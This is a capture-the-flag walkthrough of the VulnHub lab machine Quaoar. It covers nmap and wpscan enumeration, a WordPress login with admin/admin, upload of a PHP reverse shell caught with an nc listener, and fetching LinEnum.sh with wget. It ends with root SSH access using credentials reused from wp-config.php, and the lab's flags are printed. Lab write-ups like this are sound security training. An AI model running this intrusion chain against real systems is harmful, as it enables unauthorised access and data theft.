Quaoar Writeup

5 min readJul 22, 2018

In this post,we would go through the machine “Quaoar” available on vulnhub.com

After downloading the image,import the machine in VMWare player.
Now run the command “arp-scan -l” in order to figure out the IP of the machine.On successful execution,we have the ip of the machine

3. Run nmap scan in order o get the status of all the ports for this machine.

nmap -sV -sC -oA nmap-tcp 192.168.1.9

Output:

Starting Nmap 7.70 ( https://nmap.org ) at 2018–07–21 20:29 IST
Nmap scan report for 192.168.1.9
Host is up (0.0093s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
| 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp open domain ISC BIND 9.8.1-P1
| dns-nsid:
|_ bind.version: 9.8.1-P1
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
110/tcp open pop3?
|_pop3-capabilities: UIDL TOP SASL STLS CAPA PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016–10–07T04:32:43
|_Not valid after: 2026–10–07T04:32:43
|_ssl-date: 2018–07–21T15:02:36+00:00; -1s from scanner time.
139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: have more ID ENABLE LOGIN-REFERRALS Pre-login IMAP4rev1 LOGINDISABLEDA0001 post-login listed SASL-IR LITERAL+ IDLE capabilities OK STARTTLS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016–10–07T04:32:43
|_Not valid after: 2026–10–07T04:32:43
|_ssl-date: 2018–07–21T15:02:37+00:00; 0s from scanner time.
445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: more ID ENABLE LOGIN-REFERRALS Pre-login IMAP4rev1 have AUTH=PLAINA0001 OK SASL-IR LITERAL+ IDLE listed capabilities post-login
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016–10–07T04:32:43
|_Not valid after: 2026–10–07T04:32:43
|_ssl-date: 2018–07–21T15:02:36+00:00; 0s from scanner time.
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL TOP SASL(PLAIN) USER CAPA PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016–10–07T04:32:43
|_Not valid after: 2026–10–07T04:32:43
|_ssl-date: 2018–07–21T15:02:36+00:00; 0s from scanner time.
MAC Address: 44:03:2C:EA:E4:3A (Intel Corporate)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.92 seconds

4.So we have port 80 open on this machine.

5.On accessing the IP through browser,we get below page:

6.Now let us run dirbuster on this URL:got word press URL:

http://192.168.1.9/wordpress
http://192.168.1.9/wordpress/wp-admin/

7.Since this is a word press site,i ran a wpscan on it so see if we can enumerate the users:

wpscan — url 192.168.1.9/wordpress — enumerate u

Output:

[+] Finished: Sun Jul 22 11:05:08 2018
[+] Elapsed time: 00:00:05
[+] Requests made: 81
[+] Memory used: 39.508 MB

So we have the users using which we can login into the site!

8.Login using admin username and try with admin as password since there are chances that admin is also the password here.
So we were able to login!

9.Start a reverse shell using nc -nlvp 4444.

10.Navigate to Post feature page and upload the php-reverse-shell.php file.Add your local machine ip and port in the php file before uploading.This port number is same as mentioned in step 9.

This php shell can be found in : https://github.com/JohnTroony/php-webshells

11.Now view the file and click on the php shell link.

12..Observe the connect back inthe shell.

root@kali:~# nc -nlvp 4444
listening on [any] 4444 …
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.9] 38847
Linux Quaoar 3.2.0–23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
13:40:33 up 2:48, 0 users, load average: 0.00, 0.06, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off

13.Run ls command and we can see home directory available.

$ ls
bin
boot
dev
etc
home
initrd.img
lib
lost+found
media
mnt
opt
proc
root
run
sbin
selinux
srv
sys
tmp
usr
var
vmlinuz

14.Now navigate to wpadmin folder using : cd /home/wpadmin and we can see flag.txt file there.This is our first flag.

$ cat flag.txt
2bafe61f03117ac66a73c3c514de796e

15.Now in order to check privilege escalation,i imported the LinEnum.sh priv.escalation check file inside the tmp folder using steps 16 & 17.

16.Run python -m SimpleHTTPServer command inside the folder where the LinEnum.sh script is present.

17.Now run below command to import the script in tmp folder on the connect back shell.

wget -r localmachineiphere:8000/linEnum.sh

18.Execute the LinEnum.sh script

bash LinEnum.sh

19.In order to to escalate the privileges, i tried various privilege escalation tricks but was unable to elevate the privileges.

20.So i decided to enumerate more,On further enumeration,i found a file wp-config.php inside /var/www/wordpress folder.This file has MySql username:admin and password:rootpassword!

21.Now when we ran our nmap scan,we found out that port 22 is open,so i tried to ssh using the username and password we found in above step.

ssh root@192.168.1.9

password:rootpassword!

The ssh login was successful and we were in the machine as root!!

On doing ls,there was a file flag.txt and we have our next flag!!

root@Quaoar:~# ls
flag.txt vmware-tools-distrib
root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb

Quaoar Writeup

Written by Rakesh Kirola